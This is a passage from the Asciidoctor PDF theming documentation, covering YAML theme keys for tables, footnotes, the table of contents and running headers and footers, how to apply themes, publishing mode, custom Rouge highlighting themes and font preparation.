dashed\n\n|border-bottom-width\n|<<values,Number>> +\n(default: 1.25)\n|table:\n head:\n border-bottom-width: 1\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n head:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n head:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n head:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|table:\n head:\n font-style: normal\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|table:\n head:\n text-transform: uppercase\n\n3+|[#key-prefix-table-body]*Key Prefix:* <<key-prefix-table-body,table-body>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n body:\n background-color: #fdfdfd\n\n|stripe-background-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|table:\n body:\n stripe-background-color: #efefef\n\n3+|[#key-prefix-table-foot]*Key Prefix:* <<key-prefix-table-foot,table-foot>>\n\n|background-color\n|<<colors,Color>> +\n(default: $table-background-color)\n|table:\n foot:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-font-color)\n|table:\n foot:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-font-family)\n|table:\n foot:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $table-font-size)\n|table:\n foot:\n font-size: 10\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|table:\n foot:\n font-style: italic\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-table-cell,table-cell>>\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 2)\n|table:\n cell:\n padding: 3\n\n3+|[#key-prefix-table-header-cell]*Key Prefix:* <<key-prefix-table-header-cell,table-header-cell>>\n\n\/\/|align\n\/\/|<<text-alignments,Text alignment>> +\n\/\/(default: $table-head-align)\n\/\/|table:\n\/\/ header-cell:\n\/\/ align: center\n\n|background-color\n|<<colors,Color>> +\n(default: $table-head-background-color)\n|table:\n header-cell:\n background-color: #f0f0f0\n\n|font-color\n|<<colors,Color>> +\n(default: $table-head-font-color)\n|table:\n header-cell:\n font-color: #1a1a1a\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $table-head-font-family)\n|table:\n header-cell:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: $table-head-font-size)\n|table:\n header-cell:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $table-head-font-style)\n|table:\n header-cell:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $table-head-text-transform)\n|table:\n header-cell:\n text-transform: uppercase\n|===\n. 
This key only controls the color that is used for stripes.\nThe appearance of stripes is controlled using the `stripes` table attribute, the `table-stripes` document attribute (since Asciidoctor 2), or the `stripes` document attribute (prior to Asciidoctor 2).\nPermitted attribute values are even, odd, all, and none.\nPrior to Asciidoctor 2, even rows are shaded by default (e.g., `stripes=even`).\nSince Asciidoctor 2, table stripes are not enabled by default (e.g., `stripes=none`).\n\n[#keys-footnotes]\n=== Footnotes\n\nThe keys in this category control the style of the list of footnotes at the end of the chapter (book) or document (otherwise).\nIf the `footnotes-title` attribute is specified, it is styled as a block caption.\nThe styling of the links is controlled by the global link styles.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-footnotes]*Key Prefix:* <<key-prefix-footnotes,footnotes>>\n\n|font-color\n|<<colors,Color>> +\n(default: $base-font-color)\n|footnotes:\n font-color: #cccccc\n\n|font-size\n|<<values,Number>> +\n(default: 9)\n|footnotes:\n font-size: 8\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $base-font-style)\n|footnotes:\n font-style: italic\n\n|item-spacing\n|<<measurement-units,Measurement>> +\n(default: 3)\n|footnotes:\n item-spacing: 5\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|footnotes:\n margin-top: 10\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|footnotes:\n text-transform: lowercase\n|===\n\n[#keys-table-of-contents]\n=== Table of Contents (TOC)\n\nThe keys in this category control the arrangement and style of the table of contents.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-toc]*Key Prefix:* <<key-prefix-toc,toc>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n\/\/ QUESTION why is the default not inherited?\n(default: normal)\n|toc:\n font-style: bold\n\n|text-decoration\n|none {vbar} underline +\n(default: none)\n|toc:\n text-decoration: underline\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.4)\n|toc:\n line-height: 1.5\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 15)\n|toc:\n indent: 20\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|toc:\n margin-top: 0\n\n3+|[#key-prefix-toc-level]*Key Prefix:* <<key-prefix-toc-level,toc-h<n> >>^[1]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n h3-font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|toc:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|toc:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|toc:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline +\n(default: _inherit_)\n|toc:\n text-decoration: none\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|toc:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-title]*Key Prefix:* <<key-prefix-toc-title,toc-title>>\n\n
|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-h2-align)\n|toc:\n title:\n align: right\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-h2-font-color)\n|toc:\n title:\n font-color: #aa0000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-h2-font-family)\n|toc:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: $heading-h2-font-size)\n|toc:\n title:\n font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-h2-font-style)\n|toc:\n title:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-h2-text-transform)\n|toc:\n title:\n text-transform: uppercase\n\n3+|[#key-prefix-toc-dot-leader]*Key Prefix:* <<key-prefix-toc-dot-leader,toc-dot-leader>>\n\n|content\n|<<quoted-string,Quoted string>> +\n(default: '. ')\n|toc:\n dot-leader:\n content: \". \"\n\n|font-color^[2]^\n|<<colors,Color>> +\n(default: _inherit_)\n|toc:\n dot-leader:\n font-color: #999999\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: normal)\n|toc:\n dot-leader:\n font-style: bold\n\n|levels^[3]^\n|all {vbar} none {vbar} Integers (space-separated) +\n(default: all)\n|toc:\n dot-leader:\n levels: 2 3\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. The dot leader inherits all font properties except `font-style` from the root `toc` category.\n. 0-based levels (e.g., part = 0, chapter = 1).\nDot leaders are only shown for the specified levels.\nIf the value is not specified, dot leaders are shown for all levels.\n\n[#keys-running-content]\n=== Running Content (Header & Footer)\n\nThe keys in this category control the arrangement and style of running header and footer content.\nPlease note that the running content will _not_ be used unless a) the periphery (header or footer) is configured and b) the height key for the periphery is assigned a value.\n\nCAUTION: If the height of the running content periphery is larger than the page margin, the running content will cover the main content.\nTo avoid this problem, reduce the height of the running content periphery or make the page margin on that side larger.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-running-content]*Key Prefix:* <<key-prefix-running-content,running-content>>\n\n|start-at\n|title {vbar} toc {vbar} body +\n(default: body)\n|running-content:\n start-at: toc\n\n3+|[#key-prefix-header]*Key Prefix:* <<key-prefix-header,header>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|header:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|header:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|header:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|header:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|header:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|header:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|header:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|header:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} 
<<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|header:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|header:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|header:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|header:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|header:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|header:\n vertical-align: center\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|header:\n recto:\n columns: <25% =50% >25%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|header:\n recto:\n left:\n content: '\\{page-number}'\n\n3+|[#key-prefix-footer]*Key Prefix:* <<key-prefix-footer,footer>>\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|footer:\n border-color: #dddddd\n\n|border-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|footer:\n border-style: dashed\n\n|border-width\n|<<measurement-units,Measurement>> +\n(default: $base-border-width)\n|footer:\n border-width: 0.25\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|footer:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|footer:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|footer:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|footer:\n font-style: italic\n\n|height^[2]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n height: 0.75in\n\n|line-height\n|<<values,Number>> +\n(default: $base-line-height)\n|footer:\n line-height: 1.2\n\n|padding^[3]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|footer:\n padding: [0, 3, 0, 3]\n\n|image-vertical-align\n|top {vbar} middle {vbar} bottom {vbar} <<measurement-units,Measurement>> +\n(default: _not set_)\n|footer:\n image-vertical-align: 4\n\n|sectlevels\n|Integer +\n(default: 2)\n|footer:\n sectlevels: 3\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: none)\n|footer:\n text-transform: uppercase\n\n|title-style\n|document {vbar} toc {vbar} basic +\n(default: document)\n|footer:\n title-style: toc\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|footer:\n vertical-align: top\n\n|<side>-columns^[4]^\n|Column specs triple +\n(default: _not set_)\n|footer:\n verso:\n columns: <50% =0% <50%\n\n|<side>-<position>-content^[4,5]^\n|<<quoted-string,Quoted string>> +\n(default: '\\{page-number}')\n|footer:\n verso:\n center:\n content: '\\{page-number}'\n|===\n. The background color spans the width of the page, as does the border when a background color is specified.\n. *If the height is not set, the running content at this periphery is disabled.*\n. If the side padding is negative, the content will bleed into the margin of the page.\n. 
`<side>` can be `recto` (right-hand, odd-numbered pages) or `verso` (left-hand, even-numbered pages).\nWhere the page sides fall in relation to the physical or printed page number is controlled using the `pdf-folio-placement` attribute (except when `media=prepress`, which implies `physical`).\n. `<position>` can be `left`, `center` or `right`.\n\nIMPORTANT: If you don't specify a height for either the header or footer key, it effectively disables the content at that periphery.\n\nIf you define running header and footer content in your theme (including the height), you can still disable this content per document by setting the `noheader` and `nofooter` attributes in the AsciiDoc document header, respectively.\n\nIf content is not specified for the running footer, the page number (i.e., `\\{page-number}`) is shown on the left on verso pages and the right on recto pages.\nYou can disable this behavior by defining the attribute `nofooter` in the AsciiDoc document header or by defining the key `footer-<side>-content: none` in the theme.\n\nTIP: Although not listed in the table above, you can control the font settings (font-family, font-size, font-color, font-style, text-transform) that get applied to the running content in each column position for each page side (e.g., `footer-<side>-<position>-font-color`).\nFor example, you can set the font color used for the right-hand column on recto pages by setting `footer-recto-right-font-color: 6CC644`.\n\n==== Attribute References\n\nYou can use _any_ attribute defined in your AsciiDoc document (such as `doctitle`) in the content of the running header and footer.\nIn addition, the following attributes are also available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* part-title\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nYou can also use built-in AsciiDoc text replacements like `+(C)+`, numeric character references like `+&#169;+` and inline formatting (e.g., bold, italic, monospace).\n\nHere's an example that shows how attributes and replacements can be used in the running footer:\n\n[source,yaml]\n----\nheader:\n height: 0.75in\n line-height: 1\n recto:\n center:\n content: '(C) ACME -- v{revnumber}, {docdate}'\n verso:\n center:\n content: $header-recto-center-content\nfooter:\n height: 0.75in\n line-height: 1\n recto:\n right:\n content: '{section-or-chapter-title} | *{page-number}*'\n verso:\n left:\n content: '*{page-number}* | {chapter-title}'\n----\n\nYou can split the content value across multiple lines using YAML's multiline string syntax.\nIn this case, the single quotes around the string are not necessary.\nTo force a hard line break in the output, add `{sp}+` to the end of the line in normal AsciiDoc fashion.\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n line-height: 1.2\n recto:\n right:\n content: |\n Section Title - Page Number +\n {section-or-chapter-title} - {page-number}\n verso:\n left:\n content: |\n Page Number - Chapter Title +\n {page-number} - {chapter-title}\n----\n\nTIP: You can use most AsciiDoc inline formatting in the values of these keys.\nFor instance, to make the text bold, surround it in asterisks (as shown above).\nOne exception to this rule is inline images, which are described in the next section.\n\n==== Images\n\nYou can add an image to the running header or footer using the AsciiDoc inline image syntax.\nNote that the image must be the whole value for a given position (left, center or right).\nIt cannot be combined with text.\n\n
Here's an example of how to use an image in the running header (which also applies for the footer).\n\n[source,yaml,subs=attributes+]\n----\nheader:\n height: 0.75in\n image-vertical-align: 2 {conum-guard-yaml} <1>\n recto:\n center:\n content: image:footer-logo.png[width=80]\n verso:\n center:\n content: $header-recto-center-content\n----\n<1> You can use the `image-vertical-align` attribute to slightly nudge the image up or down.\n\nCAUTION: By default, the image must fit in the allotted space for the running header or footer.\nOtherwise, you will run into layout issues.\nAdjust the image width accordingly using the `pdfwidth` attribute.\nAlternatively, you can set the `fit` attribute to `scale-down` (e.g., `fit=scale-down`) to reduce the image size to fit in the available space or `contain` (i.e., `fit=contain`) to scale the image (up or down) to fit the available space.\n\n== Applying Your Theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-theme (or pdf-style):: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file and is resolved relative to `pdf-themesdir`, if specified, otherwise the current directory.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`) and is resolved relative to `pdf-themesdir`, if specified, otherwise the built-in themes dir.\n\npdf-themesdir (or pdf-stylesdir):: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\nIf `pdf-theme` ends with `.yml`, and `pdf-themesdir` is not specified, then `pdf-themesdir` defaults to the directory of the path specified by `pdf-theme`.\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-themesdir=resources\/themes -a pdf-theme=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-themesdir` attribute and just pass the absolute path of your theme file to the `pdf-theme` attribute.\n\n $ asciidoctor-pdf -a pdf-theme=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommended that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-themesdir=\/path\/to\/resources\/themes -a pdf-theme=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n\n
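If you're invoking the converter through the Asciidoctor API rather than the CLI, you can pass the same attributes programmatically.\nHere's a minimal Ruby sketch that mirrors the command above (it assumes the `resources` layout shown earlier):\n\n[source,ruby]\n----\nrequire 'asciidoctor-pdf'\n\n# equivalent to the asciidoctor-pdf invocation shown above\nAsciidoctor.convert_file 'document.adoc',\n backend: 'pdf',\n safe: :unsafe,\n attributes: {\n 'pdf-themesdir' => '\/path\/to\/resources\/themes',\n 'pdf-theme' => 'basic',\n 'pdf-fontsdir' => '\/path\/to\/resources\/fonts'\n }\n----\n\n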
As usual, you can also use build tools like Maven and Gradle to build a themed PDF.\nThe only thing you need to add to an existing build is the attributes mentioned above.\n\n* https:\/\/github.com\/asciidoctor\/asciidoctor-maven-examples\/tree\/master\/asciidoctor-pdf-with-theme-example[Maven Example]\n* https:\/\/github.com\/asciidoctor\/asciidoctor-gradle-examples\/tree\/master\/asciidoc-to-pdf-with-theme-example[Gradle Example]\n\n== Theme-Related Document Attributes\n\nThere are various settings in the theme that you can control using document attributes.\nThese settings override equivalent keys defined in the theme file, where applicable.\n\n[cols=\"2,3,6l\"]\n|===\n|Attribute |Value Type |Example\n\n|autofit-option\n|flag (default: _not set_)\n|:autofit-option:\n\n|chapter-label\n|string (default: Chapter)\n|:chapter-label: Chapitre\n\n|<face>-cover-image^[1]^\n|path^[2]^ {vbar} image macro^[3]^ +\n(format can be image or PDF)\n|:front-cover-image: image:front-cover.pdf[]\n\n|media\n|screen {vbar} print {vbar} prepress\n|:media: prepress\n\n|outlinelevels\n|number (default: same as _toclevels_)\n|:outlinelevels: 2\n\n|page-background-image^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image: image:bg.jpg[]\n\n|page-background-image-(recto{vbar}verso)^[4]^\n|path^[2]^ {vbar} image macro^[3]^\n|:page-background-image-recto: image:bg-recto.jpg[]\n\n|pagenums^[5]^\n|flag (default: _set_)\n|:pagenums:\n\n|pdf-page-layout\n|portrait {vbar} landscape\n|:pdf-page-layout: landscape\n\n|pdf-page-margin\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n|:pdf-page-margin: [1in, 0.5in]\n\n|pdf-page-size\n|https:\/\/github.com\/prawnpdf\/pdf-core\/blob\/0.6.0\/lib\/pdf\/core\/page_geometry.rb#L16-L68[Named size^] {vbar} <<measurement-units,Measurement[width, height]>>\n|:pdf-page-size: 6in x 9in\n\n|pdf-folio-placement\n|virtual {vbar} virtual-inverted {vbar} physical {vbar} physical-inverted\n|:pdf-folio-placement: physical\n\n|pdf-version\n|1.3 {vbar} 1.4 {vbar} 1.5 {vbar} 1.6 {vbar} 1.7 (default: 1.4)\n|:pdf-version: 1.7\n\n|pdfmark^[6]^\n|flag (default: _not set_)\n|:pdfmark:\n\n|text-align^[7]^\n|<<text-alignments,Text alignment>>\n|:text-align: left\n\n|title-logo-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n\n|title-page^[8]^\n|flag (default: _not set_)\n|:title-page:\n\n|title-page-background-image\n|path^[2]^ {vbar} image macro^[3]^\n|:title-page-background-image: image:title-bg.jpg[]\n|===\n\n. `<face>` can be `front` or `back`.\n. The path is resolved relative to base_dir.\n. The target of the image macro is resolved relative to `imagesdir`.\nIf the image macro syntax is not used, the value is resolved relative to the base directory, which defaults to the document directory.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).\nThe size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nThe position of the background image can be controlled using the `position` attribute.\nIf the recto (right-hand, odd-numbered pages) or verso (left-hand, even-numbered pages) background is specified, it will be used only for that side.\nIf a background image isn't specified for a side, the converter will use the default page background image (`page-background-image`), if specified.\nTo disable the background image for a side, use the value `none`.\n. Controls whether the `page-number` attribute is accessible to the running header and footer content specified in the theme file.\nUse the `noheader` and `nofooter` attributes to disable the running header and footer, respectively, from the document.\n. Enables generation of the http:\/\/milan.kupcevic.net\/ghostscript-ps-pdf\/#marks[pdfmark] file, which contains metadata that is fed to Ghostscript when optimizing the PDF file.\n. _(Experimental)_ The `text-align` document attribute is intended as a simple way to toggle text justification.\nThe value of this attribute overrides the `base-align` key set by the theme.\nFor more fine-grained control, you should customize using the theme.\n. Force a title page to be added even when the doctype is not book.\n\n
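For example, here's a hypothetical document header that combines several of the attributes from the table above:\n\n[source,asciidoc]\n----\n= Document Title\n:media: prepress\n:pdf-page-size: 6in x 9in\n:front-cover-image: image:front-cover.pdf[]\n:title-logo-image: image:logo.png[top=25%, align=center, pdfwidth=0.5in]\n----\n\n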
== Publishing Mode\n\nAsciidoctor PDF provides the following features to assist with publishing:\n\n* Double-sided (mirror) page margins\n* Automatic facing pages\n\nThese features are activated when you set the `media` attribute to `prepress` in the header of your AsciiDoc document or from the CLI or API.\nThe following sections describe the behaviors that this setting activates.\n\n=== Double-Sided Page Margins\n\nThe page margins for the recto (right-hand, odd-numbered) and verso (left-hand, even-numbered) pages are automatically calculated by replacing the side page margins with the values of the `page-margin-inner` and `page-margin-outer` keys.\n\nFor example, let's assume you've defined the following settings in your theme:\n\n[source,yaml]\n----\npage:\n margin: [0.5in, 0.67in, 0.67in, 0.67in]\n margin-inner: 0.75in\n margin-outer: 0.59in\n----\n\nThe page margins for the recto and verso pages will be resolved as follows:\n\nrecto page margin:: [0.5in, *0.59in*, 0.67in, *0.75in*]\nverso page margin:: [0.5in, *0.75in*, 0.67in, *0.59in*]\n\nThe page margins alternate between recto and verso.\nThe first page in the document is a recto page.\n\n=== Automatic Facing Pages\n\nWhen converting the book doctype using the prepress media setting, a blank page will be inserted when necessary to ensure the following elements start on a recto page:\n\n* Title page\n* Table of contents\n* First page of body\n* Parts and chapters\n\nOther \"`facing`\" pages may be added in the future.\n\nIt's possible to disable the automatic facing feature for a given part or chapter.\nThis can be done by adding the nonfacing option to the section node.\nWhen the nonfacing option is present, the part or chapter title will be placed on the following page.\n\n[source,asciidoc]\n----\n[%nonfacing]\n= Minor Chapter\n\ncontent\n----\n\nFor documents that use the article doctype, Asciidoctor PDF incorrectly places the document title and table of contents on their own pages.\nThis can cause the page numbering and the page facing to fall out of sync.\nAs a workaround, Asciidoctor PDF inserts a blank page, if necessary, to ensure the first page of body content is a recto-facing page.\n\nYou can check on the status of this defect by following https:\/\/github.com\/asciidoctor\/asciidoctor-pdf\/issues\/95[issue #95].\n\n== Source Highlighting Theme\n\nYou can define and apply your own source highlighting theme to source blocks when using Rouge as the source highlighter.\nThis section explains how.\n\nA custom theme for Rouge is defined using a Ruby class.\nStart by creating a Ruby source file to define your theme.\nName the file according to the name of your theme and put the file in a folder of your choice (e.g., [.path]_rouge_themes\/custom.rb_).\n
The name of the Ruby class doesn't matter, though it's customary to name it according to the name of the theme as well.\n\n.rouge_themes\/custom.rb\n[source,ruby]\n----\nrequire 'rouge' unless defined? ::Rouge.version\n\nmodule Rouge; module Themes\n class Custom < CSSTheme\n name 'custom'\n\n style Comment, fg: '#008800', italic: true\n style Error, fg: '#a61717', bg: '#e3d2d2'\n style Str, fg: '#0000ff'\n style Str::Char, fg: '#800080'\n style Num, fg: '#0000ff'\n style Keyword, fg: '#000080', bold: true\n style Operator::Word, bold: true\n style Name::Tag, fg: '#000080', bold: true\n style Name::Attribute, fg: '#ff0000'\n style Generic::Deleted, fg: '#000000', bg: '#ffdddd', inline_block: true, extend: true\n style Generic::Inserted, fg: '#000000', bg: '#ddffdd', inline_block: true, extend: true\n style Text, {}\n end\nend; end\n----\n\nEach style declaration accepts the following properties:\n\n* `fg` - sets the foreground (text) color\n* `bg` - sets the background color\n* `bold` - changes the font weight to bold\n* `italic` - changes the font style to italic\n* `underline` - adds an underline to the text\n* `inline_block` - fills the background color to the height of the line (Asciidoctor PDF only)\n* `extend` - extends the background color to the end of the line for a line-oriented match (Asciidoctor PDF only)\n\nColors are defined using hexadecimal format (e.g., #ff0000 for red).\n\nUse the `Text` token to set the background color of the source block and the default text color.\n\nThe complete list of tokens can be found in the https:\/\/github.com\/jneen\/rouge\/blob\/master\/lib\/rouge\/token.rb[token.rb] file from Rouge.\nRefer to the https:\/\/github.com\/jneen\/rouge\/tree\/master\/lib\/rouge\/themes[bundled themes] to find more examples.\n\nOnce you've defined your theme, you need to enable it using the `rouge-style` document attribute, which you specify in the document header or via the Asciidoctor CLI or API.\n\n[source,asciidoc]\n----\n:source-highlighter: rouge\n:rouge-style: custom\n----\n\nFinally, you need to activate your theme by requiring the theme file when you invoke Asciidoctor.\n\n $ asciidoctor -r .\/rouge_themes\/custom.rb sample.adoc\n\nYou should now see that the source code is highlighted to your liking.\nFor more information about source highlighting with Rouge, refer to the http:\/\/rouge.jneen.net\/[Rouge project page].\n\n\/\/\/\/\n== Resources for Extending Asciidoctor PDF\n\n* http:\/\/www.sitepoint.com\/hackable-pdf-typesetting-in-ruby-with-prawn[Hackable PDF typesetting in Ruby with Prawn]\n\/\/\/\/\n\n[appendix]\n== Preparing a Custom Font\n\nAny TTF font can be used with Prawn--and hence Asciidoctor PDF--without modifications (unless, of course, it's corrupt or contains errors).\nHowever, you may discover that kerning is disabled and certain required glyphs are missing.\nTo address these problems, you need to prepare the font using a font program such as {url-fontforge}[FontForge].\n\n=== Validate the Font\n\nBefore using the font, you may want to check that the font is valid.\nTo do so, create the following script, which will verify that the TTF font is free from errors.\n\n.validate-font.rb\n[source,ruby]\n----\nrequire 'ttfunk'\nrequire 'ttfunk\/subset_collection'\n\n# attempt to encode every glyph subset; a defect in the font surfaces as an error\nttf_subsets = TTFunk::SubsetCollection.new TTFunk::File.open ARGV[0]\n(0...(ttf_subsets.instance_variable_get :@subsets).size).each {|idx| ttf_subsets[idx].encode }\n----\n\nRun the script on your font as follows:\n\n $ ruby validate-font.rb path\/to\/font.ttf\n\nIf this script fails, the font will not work with Asciidoctor PDF.\n
To repair it, open the font in FontForge and resave it using menu:File[Generate Fonts...,Generate].\nDismiss any warning dialogs.\n\nResaving the font in FontForge will usually resolve any errors in the font.\n(If not, you may need to find another font, or at least another copy of it).\n\n=== Modifying the Font\n\nTo ready your font for use with Asciidoctor PDF, you'll need to modify it using a font program.\nWe recommend using {url-fontforge}[FontForge].\nBut don't let this scare you off.\nFontForge essentially works like a vector-drawing tool, in which each character is a separate canvas.\nYou can find a crash course in how to use the program on the FontForge project site.\n\nHere are the modifications you need to apply to a custom font for it to work best with Asciidoctor PDF:\n\n* Convert the font to TTF (only required if the font is not already a TTF, such as an OTF or TTC).\n* Add the glyphs for the required characters if missing from the font (optional if using a fallback font).\n* Subset the font to exclude unused characters to reduce the file size (optional).\n* Save the file using the old-style kern table to activate kerning.\n\nNOTE: Technically, subsetting the font (i.e., removing glyphs) is not required since Prawn only embeds the characters from the font used in the document (i.e., it automatically subsets the font).\nHowever, if you plan to commit the font to a repository, subsetting helps keep the file size down.\n\nMost fonts do not provide glyphs for all the Unicode character ranges (i.e., scripts).\n(A glyph is the corresponding vector image for a Unicode character).\nIn fact, many fonts only include glyphs for Latin (Basic, Supplement, and Extended) and a few other scripts (e.g., Cyrillic, Greek).\nThat means certain glyphs Asciidoctor PDF relies on may be missing from the font.\n\nBelow are the non-Latin characters that Asciidoctor PDF uses (for which glyphs are often missing).\nUnless you're using a fallback font that fills in the missing glyphs, you need to ensure these glyphs are present in your font (and add them if not).\n\n* \\u00a0 - no-break space\n* \\ufeff - zero width no-break space\n* \\u200b - zero width space (used for line break hints)\n* \\u000a - line feed character (zero width)\n* \\u2009 - thin space (used in 